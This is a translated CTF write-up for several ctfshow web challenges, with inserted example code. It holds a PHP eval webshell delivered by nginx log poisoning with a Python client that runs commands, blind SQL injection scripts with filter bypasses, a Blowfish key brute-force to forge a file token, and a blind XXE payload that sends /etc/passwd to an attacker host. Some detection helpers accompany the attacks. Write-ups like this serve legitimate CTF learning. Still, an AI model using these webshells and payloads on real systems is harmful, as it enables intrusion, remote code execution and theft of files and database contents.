签到_观己 (sign-in challenge)
`php` is filtered, so the include can't point at a .php file or a php:// wrapper; read a file the server writes for us instead.
Include the log file /var/log/nginx/access.log.
The User-Agent is written into that log verbatim, so send one request with a one-line webshell as the UA and then include the log to execute it:
<?php @eval($_POST[shell]);?>
Connect with AntSword (蚁剑) and the flag is visible in the root directory.
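To make the two-step procedure concrete, here is an added example (not from the writeup): a small client that poisons the access log through the User-Agent and then drives the webshell, plus a detector that parses nginx combined-format log lines and flags entries carrying PHP tags, which is how you would spot this attack from the other side. The include parameter name `file` is a hypothetical assumption; the page does not state it. The sample log lines are constructed.

```python
"""Log poisoning for the 观己 challenge, and a detector for the same trick.

Added example, not the writeup's code. Assumptions not stated on the page:
  - the include parameter is called `file` (hypothetical name)
  - nginx writes the User-Agent into /var/log/nginx/access.log verbatim
"""
import re
import sys

LOG_PATH = "/var/log/nginx/access.log"
WEBSHELL = "<?php @eval($_POST[shell]);?>"   # the one-liner from the writeup


def php_command(cmd):
    """PHP code sent to the webshell's eval(): run a shell command, escaping single quotes."""
    return "system('%s');" % cmd.replace("'", "\\'")


def poison(base_url):
    """Step 1: write the webshell into the access log via the User-Agent header.

    Any request will do; nginx logs the UA string exactly as sent.
    """
    import requests  # imported here so the detector part works without the package
    requests.get(base_url, headers={"User-Agent": WEBSHELL}, timeout=10)


def run(base_url, cmd, include_param="file"):
    """Step 2: include the poisoned log so the shell runs, and pass it PHP via POST.

    The log is re-included on every request, so each command is a fresh POST.
    """
    import requests
    r = requests.post(
        base_url,
        params={include_param: LOG_PATH},
        data={"shell": php_command(cmd)},
        timeout=10,
    )
    return r.text


# nginx "combined" format: ip - user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
PHP_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)


def find_poisoned(lines):
    """Return (ip, field, value) for every log entry whose referer, UA or
    request line carries a PHP open tag. Such an entry is the poison itself;
    the include that triggers it shows up as a request for the log path."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue
        for field in ("ref", "ua", "req"):
            if PHP_TAG.search(m.group(field)):
                hits.append((m.group("ip"), field, m.group(field)))
    return hits


# constructed sample: a normal hit, the poisoning request, then the include
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Oct/2020:11:42:00 +0800] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [20/Oct/2020:11:42:07 +0800] "GET / HTTP/1.1" 200 512 "-" "<?php @eval($_POST[shell]);?>"',
    '10.0.0.9 - - [20/Oct/2020:11:42:09 +0800] "GET /?file=/var/log/nginx/access.log HTTP/1.1" 200 2048 "-" "python-requests/2.24"',
]

if __name__ == "__main__":
    if len(sys.argv) > 1:                 # python3 poison.py http://<instance>/
        poison(sys.argv[1])
        print(run(sys.argv[1], "ls /"))
    else:
        print(find_poisoned(SAMPLE_LOG))
```

Run it with the instance URL as its only argument to attack; with no argument it just runs the detector over the constructed lines. Note that the log is re-included on every request, so the webshell keeps working until the log rotates.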
web1_观字
Just replace every `.` with the full-width `。` and it passes.
web2_观星
One look and it's boolean-based blind injection.
web1-14 had similar challenges, as I recall.
First check what is filtered.
A fuzz wordlist for that: https://github.com/fuzzdb-project/fuzzdb
Better to write your own, though.
I grabbed 羽's script (●'◡'●)
- Commas filtered: use the form substr((database())from({})for(1))
- `=` and `like` filtered: bypass with regexp or in
- ascii filtered: use ord instead
- Single quotes filtered: use hex
- Spaces filtered: use parentheses instead
#author 羽
import requests
url = "http://733ff90c-f8ab-4a3b-af6e-3ebb2f4a7b12.chall.ctf.show/index.php?id=1^"
flag = ""
for i in range(1, 50):
    print("i=" + str(i))
    for j in range(38, 126):
        #u = "case(ord(substr(database()from({0})for(1))))when({1})then(2)else(3)end".format(i, j)  # database name: web1
        #u = "case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(2)else(3)end".format(i, j)  # table names: flag, page, user
        #u = "case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({0})for(1))))when({1})then(2)else(3)end".format(i, j)  # column names: FLAG_COLUMN, flag
        u = "case(ord(substr((select(group_concat(flag))from(flag))from({0})for(1))))when({1})then(2)else(3)end".format(i, j)  # flag column
        # id=1^2=3 when the byte matches, id=1^3=2 otherwise; the marker text tells the two pages apart
        u = url + u
        r = requests.get(u)
        t = r.text
        if "I asked nothing" in t:
            flag += chr(j)
            print(flag)
            break
I just tweaked it a little, haha
import requests
url = "http://305d6aed-86db-41a3-b428-8831ce41b54b.chall.ctf.show/index.php?id=1^"
marker = 'Languor was'   # text that only appears when the CASE matched
name = ''
for number1 in range(1, 50):
    for number2 in range(38, 126):
        # urls = "case(ord(substr(database()from(%d)for(1))))when(%d)then(2)else(3)end" % (number1, number2)  # database name: web1
        # urls = "case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from(%d)for(1))))when(%d)then(2)else(3)end" % (number1, number2)  # table names: flag, page, user
        # urls = "case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from(%d)for(1))))when(%d)then(2)else(3)end" % (number1, number2)  # column names: FLAG_COLUMN, flag
        urls = "case(ord(substr((select(group_concat(flag))from(flag))from(%d)for(1))))when(%d)then(2)else(3)end" % (number1, number2)  # flag column
        urls = url + urls
        response = requests.get(urls)
        if marker in response.text:
            name += chr(number2)
            print(name)
            break
Update, 2020.10.20 11:42 A.M.
A different angle
I wrote another version using a different method, to broaden the idea: instead of a CASE expression it compares ord() with `>` directly, lets the XOR flip id, and uses /**/ in place of the filtered spaces.
import requests
url = "http://8f65f4ee-c785-40f6-bbad-c2c4890e4850.chall.ctf.show/index.php?id=1^"
marker = "all about you"   # text of the page you get once ord(c) > number2 stops holding
name = ''
for number1 in range(1, 50):
    for number2 in range(44, 126):
        #urls = "(ord(substr(database()/**/from/**/%d/**/for/**/1))>%d)" % (number1, number2)
        #urls = "(ord(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/in(database()))/**/from/**/%d/**/for/**/1))>%d)^0" % (number1, number2)
        #urls = "(ord(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/in(0x666c6167))from/**/%d/**/for/**/1/**/))>%d)^0" % (number1, number2)
        urls = "(ord(substr((select(flag)from(flag))from/**/%d/**/for/**/1))>(%d))" % (number1, number2)
        urls = url + urls
        response = requests.get(urls)
        # counting number2 upward, the first value for which ord(c) > number2 is false is ord(c) itself
        if marker in response.text:
            name += chr(number2)
            print(name)
            break
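All three scripts above walk the byte range linearly, up to 88 requests per character. As an added example (not part of the writeup), the same oracle can be driven by binary search: the `>` comparison from the last script already gives an ordering, so seven requests fix each byte exactly. The block keeps the writeup's constraints (no comma, space, quote, `=` or `ascii()`, and the `id=1^(...)` trick); BASE_URL and MARKER are placeholders for the instance URL and for the text of the page shown when the comparison is false, and the offline `fake_oracle` stands in for the database so the search logic can be checked without a target.

```python
"""Boolean-blind extraction by bisection over the XOR oracle used above.

Added example, not the writeup's code. BASE_URL and MARKER are placeholders.
"""

BASE_URL = "http://REPLACE-ME.chall.ctf.show/index.php?id=1^"
MARKER = "all about you"   # text that appears only when (ord(...) > n) is false, i.e. id=1^0=1

# subqueries written without commas, spaces or quotes, as the writeup does
FLAG_QUERY = "select(group_concat(flag))from(flag)"
TABLES_QUERY = "select(group_concat(table_name))from(information_schema.tables)where(table_schema)in(database())"


def payload(subquery, pos, n):
    """(ord(byte pos of subquery) > n): true -> id=1^1=0, false -> id=1^0=1."""
    return f"(ord(substr(({subquery})from({pos})for(1)))>({n}))"


def http_oracle(subquery):
    """Real oracle: one GET per question, answering whether ord(byte pos) > n."""
    import requests  # imported here so the offline parts need no package

    def ask(pos, n):
        r = requests.get(BASE_URL + payload(subquery, pos, n), timeout=10)
        return MARKER not in r.text
    return ask


def bisect_byte(ask, pos, lo=0, hi=127):
    """Smallest v in [lo, hi] with not ask(pos, v); that v is ord(byte), or 0 past the end.

    Invariant: ord(byte) is in [lo, hi]. With a 128-wide range this is exactly 7 questions.
    """
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(pos, mid):      # ord > mid  -> answer in [mid+1, hi]
            lo = mid + 1
        else:                  # ord <= mid -> answer in [lo, mid]
            hi = mid
    return lo


def extract(ask, max_len=64):
    """Pull bytes until substr() runs past the end: ord('') is 0 in MySQL."""
    out = ""
    for pos in range(1, max_len + 1):
        v = bisect_byte(ask, pos)
        if v == 0:
            break
        out += chr(v)
    return out


def fake_oracle(secret):
    """Offline stand-in for the database, answering like the real comparison would."""
    def ask(pos, n):
        ch = secret[pos - 1:pos]
        return (ord(ch) if ch else 0) > n
    return ask


def counted(ask):
    """Wrap an oracle to count requests; handy for comparing search strategies."""
    count = [0]

    def wrapped(pos, n):
        count[0] += 1
        return ask(pos, n)
    return wrapped, count


if __name__ == "__main__":
    print(extract(http_oracle(FLAG_QUERY)))
```

Swap FLAG_QUERY for TABLES_QUERY (or a columns query built the same way) to repeat the writeup's enumeration steps; raise max_len if a group_concat result is longer than 64 bytes.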
web3_观图
Ugh, this one.
An address is given; it looks like base64 but isn't.
Visit showImage.php.
It uses this encryption scheme.
The masters say it's DES,
but the DES cipher name would be des-ecb.
I really couldn't find anything on this bf-ecb, hoping a master leaves a comment to explain.
openssl_decrypt() decrypts and openssl_encrypt() encrypts; the cipher name 'bf-ecb' is OpenSSL's Blowfish in ECB mode, and the key is the 8 characters substr(md5('ctfshow'.$i),3,8), so the only secret is the integer $i.
The goal is now obvious.
$i comes from PHP's rand(); the script below assumes it is below 32768 (the classic 16-bit RAND_MAX; getrandmax() on a Linux build of PHP is 2147483647, so check the challenge source before relying on that bound), which is cheap to brute-force.
Once $i is known, encrypt the file name we want and request it.
<?php
// brute-force the rand() value behind the key: decrypt the token from the image URL with
// every candidate key until the plaintext looks like an image file name
$image = "Z6Ilu83MIDw=";                          // token from the URL (base64 ciphertext)
for ($i = 0; $i < 32768; $i++) {
    $key = substr(md5('ctfshow' . $i), 3, 8);      // 8-char key, exactly as the challenge derives it
    $str = openssl_decrypt($image, 'bf-ecb', $key); // false on a padding error, i.e. wrong key
    if ($str !== false && (strpos($str, "gif") !== false || strpos($str, "jpg") !== false || strpos($str, "png") !== false)) {
        print($i);
        break;
    }
}
// re-use the recovered $i to encrypt the file we actually want to read
$key = substr(md5('ctfshow' . $i), 3, 8);
$image = "config.php";
$str = openssl_encrypt($image, 'bf-ecb', $key);
echo urlencode($str);
?>
Request the image endpoint with that encoded token, save the response and open it: it is config.php.
web4_观心
Clicking the fortune-telling (占卜) feature reveals an API.
Look closely and an XML request is plainly visible.
No surprise: it is an XXE vulnerability.
Because it is blind, out-of-band (OOB) XXE it is a bit harder; recommended reading from the masters:
https://www.freebuf.com/articles/web/177979.html
https://blog.csdn.net/miuzzx/article/details/107706685
https://www.cnblogs.com/anweilx/p/13417899.html
http://www.manongjc.com/detail/19-mqrlpvrfmyquahz.html
https://www.cnblogs.com/Cl0ud/p/13549041.html
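As an added example (not from the writeup or the linked articles), the block below builds the two pieces a blind OOB XXE needs, the document that pulls an external DTD and the DTD that exfiltrates a file in a second request, and pairs them with a pre-parse check that flags untrusted XML carrying a DOCTYPE, entity declarations or SYSTEM/PUBLIC references. The attacker host, the element names and the use of php://filter (the challenge's backend language is not shown on the page) are assumptions.

```python
"""Blind OOB XXE: payload construction and a pre-parse gate.

Added example, not the writeup's code. ATTACKER_HOST, the <data>/<name> element
names and the php://filter wrapper are hypothetical; the real API schema is not on the page.
"""
import re

ATTACKER_HOST = "attacker.example"   # hypothetical listener that also serves evil.dtd


def build_oob_payload(attacker_host, target_file="/etc/passwd"):
    """Return (xml_document, external_dtd).

    The document only references the external DTD. Inside that DTD, %file reads the
    target (base64 so no byte breaks the URL), %oob declares a second entity whose
    URL embeds %file, and %send fires the request that carries the data to the
    listener. Nothing has to be reflected in the response, which is why this works
    blind; it only needs the server to reach the attacker host.
    """
    dtd = (
        f'<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource={target_file}">\n'
        f'<!ENTITY % oob "<!ENTITY &#x25; send SYSTEM \'http://{attacker_host}/?d=%file;\'>">\n'
        "%oob;\n"
        "%send;\n"
    )
    xml = (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [ <!ENTITY % dtd SYSTEM "http://{attacker_host}/evil.dtd"> %dtd; ]>\n'
        "<data><name>ctfshow</name></data>\n"
    )
    return xml, dtd


DOCTYPE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
ENTITY = re.compile(rb"<!ENTITY\s", re.IGNORECASE)
EXTERNAL = re.compile(rb"\b(SYSTEM|PUBLIC)\b")


def xxe_indicators(xml_bytes):
    """Cheap gate to run before handing untrusted XML to a parser.

    An API that expects a flat document has no business receiving a DTD at all;
    SYSTEM/PUBLIC identifiers are the part that actually triggers fetches.
    Returns the indicators found, empty for a clean document.
    """
    found = []
    if DOCTYPE.search(xml_bytes):
        found.append("doctype")
    if ENTITY.search(xml_bytes):
        found.append("entity")
    if EXTERNAL.search(xml_bytes):
        found.append("external")
    return found


BENIGN = b'<?xml version="1.0"?><data><name>ctfshow</name></data>'   # constructed sample

if __name__ == "__main__":
    doc, dtd = build_oob_payload(ATTACKER_HOST)
    print(doc)
    print(xxe_indicators(doc.encode()), xxe_indicators(BENIGN))
```

The gate is a detection aid, not the fix: the fix is a parser that never loads external entities or DTDs (in PHP, do not pass LIBXML_NOENT, and on versions before 8.0 call libxml_disable_entity_loader(true) as well).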
FROM: 浅浅淡淡 [hellohy]